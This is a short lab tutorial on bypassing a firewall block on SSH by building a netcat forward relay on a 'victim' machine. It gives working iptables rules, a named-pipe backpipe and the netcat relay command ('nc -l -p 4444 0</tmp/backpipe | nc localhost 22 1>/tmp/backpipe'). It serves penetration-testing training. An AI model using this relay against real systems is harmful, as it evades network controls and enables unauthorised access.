Bypassing Firewall with Forward Relays

Lab Setup

Block port for incoming TCP packet on Victim Machine

sudo iptables -A INPUT -s <attacker ip> -p tcp --dport 22 -j DROP

Allow TCP packet on another port on Victim Machine

iptables –I INPUT 1 –s <attacker ip> –p tcp --dport 4444 –j ACCEPT

Check netcat communication between Attacker and Client

On Victim Machine

nc –v –l –p 4444

On the Kali Machine

nc 192.168.1.7 4444

Use Netcat Realy Backpipe to Access SSH Service

The First command makes a special type of file called a FIFO or named pipe. We call it backpipe because it is going to carry our responses back through the relay.

Now the second command makes a netcat listener that is allowed through the firewall. This Netcat listener will connect its standard input (0<) to the backpipe. We then forward the standard output of this Netcat listener to Netcat client, which connects to our localhost (127.0.0.1) on TCP port 22 where sshd listens. We then use the forward pipe (1>) to send data and receive responses simultaneously. We need a back and forward pipe because Netcat provides two-way communication.

For this you need to have access to the victim machine.

Victim Machine

mknod /tmp/backpipe p

  • p: Tells the mknod to create a FIFO

nc –l –p 4444 0</tmp/backpipe | nc localhost 22 1>/tmp/backpipe

  • -l: Listener

  • -p: Port

Attacker Machine

Access SSH Through Netcat Relay

ssh msfadmin@10.10.10.3 –p 4444

  • -p : To specify Port

REFERENCES

PreviousChisel - Double PivotingNextReverse Relays - Metasploit

Last updated